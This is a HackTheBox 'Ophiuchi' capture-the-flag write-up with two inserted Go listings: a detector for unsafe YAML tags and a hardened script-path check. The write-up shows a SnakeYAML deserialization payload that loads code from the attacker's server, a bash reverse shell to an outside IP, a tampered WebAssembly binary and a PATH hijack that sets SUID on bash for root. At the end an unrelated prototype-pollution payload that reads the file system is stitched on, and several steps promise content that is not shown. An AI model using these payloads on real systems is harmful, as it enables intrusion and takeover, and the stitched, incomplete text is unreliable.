CTF-Writeups/HackTheBox/Ophiuchi.md
2021-04-23 08:58:56 +05:00

HackTheBox-Ophiuchi

Rustscan


```text
rustscan -a 10.10.10.227 -- -A -sC -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

Open 10.10.10.227:22
Open 10.10.10.227:8080

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    syn-ack ttl 63 Apache Tomcat 9.0.38
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Parse YAML
```

PORT 8080 (HTTP)

There's a YAML parser on this page, so I tried submitting some input, but got no response.

From the nmap scan we already know that Apache Tomcat 9.0.38 is running, so I tried logging in at /manager, but wasn't able to log in with the default credentials.

So after googling for Apache Tomcat 9.0.38 vulnerabilities/exploits I found a SnakeYAML deserialization exploit.

The exploit relies on SnakeYAML's ability to instantiate a Java class (calling its constructor) from a YAML tag:

```yaml
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://VPN_IP/"]
  ]]
]
```

We'll see a request being made to our machine for /META-INF/services/javax.script.ScriptEngineFactory.

We can abuse this by mirroring that file structure on our server: a directory META-INF with a subdirectory services containing a file named javax.script.ScriptEngineFactory, and in that file we name our exploit class.
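A request-side check for the mechanism described above, written here as an added example (it is not part of the writeup or of SnakeYAML): it flags every `!!` or verbatim global tag that is not one of YAML's core types, since SnakeYAML's default Constructor resolves such a tag to a Java class and instantiates it. Inside the application the real fix is to parse untrusted input with SnakeYAML's SafeConstructor; the sample documents below are constructed.

```go
package main

import (
	"fmt"
	"regexp"
)

// Tags of the YAML core/1.1 schema. Any other "!!" tag is application
// specific, and under SnakeYAML's default Constructor it names a Java class.
var coreTags = map[string]bool{
	"str": true, "int": true, "float": true, "bool": true, "null": true,
	"seq": true, "map": true, "set": true, "omap": true, "pairs": true,
	"binary": true, "timestamp": true, "merge": true, "value": true,
}

// Matches the short form (!!java.net.URL) and the verbatim form
// (!<tag:yaml.org,2002:java.net.URL>), which resolve to the same tag.
var tagRe = regexp.MustCompile(`!!([\w.$]+)|!<tag:yaml\.org,2002:([\w.$]+)>`)

// SuspiciousTags returns every non-core global tag in doc, in order.
func SuspiciousTags(doc string) []string {
	var out []string
	for _, m := range tagRe.FindAllStringSubmatch(doc, -1) {
		name := m[1]
		if name == "" {
			name = m[2]
		}
		if !coreTags[name] {
			out = append(out, name)
		}
	}
	return out
}

// ShouldBlock is the decision a filter in front of the parser would make:
// reject the document if it names any class at all.
func ShouldBlock(doc string) bool { return len(SuspiciousTags(doc)) > 0 }

// Constructed samples: the gadget chain from the writeup and a benign document.
var SamplePayload = "!!javax.script.ScriptEngineManager [\n" +
	"  !!java.net.URLClassLoader [[\n    !!java.net.URL [\"http://VPN_IP/\"]\n  ]]\n]\n"
var BenignDoc = "name: !!str ophiuchi\nports: [22, 8080]\n"

func main() {
	for _, d := range []string{SamplePayload, BenignDoc} {
		fmt.Printf("block=%v tags=%v\n", ShouldBlock(d), SuspiciousTags(d))
	}
}
```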

Create a file named exploit.java (you can get the Java code from the link below). In it we'll first try to ping our local machine to check whether the exploit works, so that we can then go for a reverse shell.

https://github.com/artsploit/yaml-payload/blob/master/src/artsploit/AwesomeScriptEngineFactory.java

Compile the Java file using javac and you will get a .class file.

In the javax.script.ScriptEngineFactory file we include this content:

We also make a folder named snakeyml containing the exploit.class file.

So the file structure will look like this. Start a python3 web server or apache2 to host the folder, and submit the same YAML constructor payload we used before.

After sending it we receive a 500 error.

The error shows that we compiled the Java file with the latest javac, so we need to compile it for class file version 55. We can do this by specifying the release as a parameter to javac. (Thank you, Stack Overflow.)

Now compile it with the release set to 11, start the python3 web server, and start listening for ICMP packets on the tun0 interface.

When we submit the constructor payload in the YAML parser, we see the ICMP packets.

But there was a problem getting a reverse shell: no matter which reverse shell I tried, bash or netcat, I couldn't get a shell, so I made a script containing a bash reverse shell:

```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.196/4242 0>&1
```

Now we download the bash script onto the target with wget, save it in /tmp, and execute it with bash; we also set up a netcat listener. So we modify our exploit.java file accordingly.

Enter this in the YAML parser input box:

Once you submit it, you'll see the request for exploit.sh on your terminal and you will get a reverse shell.

Stabilize the shell using python3.

Since Apache Tomcat is running, we can now search for its users file.

Now use the find command to locate that file.

We can try to switch user to admin with that password on the machine.

Reading the source code, we can see that it reads the WebAssembly binary, then gets a value from the info function; if that value is not equal to 1 the program prints "Not ready to deploy", otherwise it executes a deploy.sh script.

One thing to note: main.wasm and deploy.sh are not referenced by absolute path in the source, meaning we can create our own files and play around with the PATH variable. So first I am going to download main.wasm to my machine.

https://github.com/WebAssembly/wabt

Here we'll use a tool named WABT (WebAssembly Binary Toolkit). We need to convert main.wasm to a .wat file, which is the text format of that binary. But first let's look at the info function in the binary using wasm-decompile, which decompiles the binary to C-like syntax.

We can see that the info function returns 0, so that's what we need to change. Convert the .wasm file to .wat:

Opening the .wat file, we can see that the constant value is 0.

Remember that the source code had the condition f != 1 (if f is not equal to 1): it prints "Not ready to deploy", otherwise it executes the deploy.sh script. So change that 0 to 1.

Now we need it back in binary form (.wasm), so convert it from .wat to .wasm.

Transfer this to the target's /tmp directory and also create a deploy.sh file there. I added a command to set the SUID bit on bash in that script.

Now add /tmp to the PATH variable and run the Go program with sudo.

We can see that /bin/bash now has the SUID bit set, which means we can get root by running bash with -p.
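The root cause above is that a privileged Go program resolves deploy.sh through the caller's PATH. Added example, not the box's program: the vulnerable lookup beside a hardened variant that pins the script to a fixed directory (DeployDir is a hypothetical location; the writeup does not give the real one) and refuses a script that non-owners could modify.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
)

// DeployDir is a hypothetical fixed install directory for the deploy script.
const DeployDir = "/opt/wasm-deploy"

// VulnerableCommand is the pattern the writeup abuses: a bare name is
// resolved through $PATH, so a user allowed to run the program via sudo
// who prepends /tmp to PATH gets their own deploy.sh executed as root.
func VulnerableCommand(name string) *exec.Cmd {
	return exec.Command(name) // exec.LookPath consults $PATH here
}

// TrustedScriptPath pins name inside DeployDir and refuses anything that
// could point elsewhere: an absolute path, "..", or any directory component.
func TrustedScriptPath(name string) (string, error) {
	if name == "" || name == "." || name == ".." || filepath.Base(name) != name {
		return "", errors.New("script name must be a bare file name")
	}
	return filepath.Join(DeployDir, name), nil
}

// CheckNotWritableByOthers rejects a script that group or world can edit;
// once the path is fixed, a writable file is the remaining way for an
// unprivileged user to control what root executes.
func CheckNotWritableByOthers(path string) error {
	fi, err := os.Stat(path)
	if err != nil {
		return err
	}
	if fi.Mode().Perm()&0o022 != 0 {
		return fmt.Errorf("%s is writable by group or others", path)
	}
	return nil
}

func main() {
	for _, n := range []string{"deploy.sh", "../tmp/deploy.sh", "/tmp/deploy.sh"} {
		p, err := TrustedScriptPath(n)
		fmt.Printf("%-20q -> %q %v\n", n, p, err)
	}
	fmt.Println("vulnerable lookup resolves via PATH to:", VulnerableCommand("deploy.sh").Path)
}
```

Pinning the path removes the dependency on the caller's environment; keeping sudo's secure_path setting in place additionally stops a modified PATH from reaching the program at all.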

You can also get a reverse shell using netcat (OpenBSD).

```json
{
  "song": {
    "name": "Not Polluting with the boys"
  },
  "__proto__.block": {
    "type": "Text",
    "line": "'test'; return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
    "val": "ARZ"
  }
}
```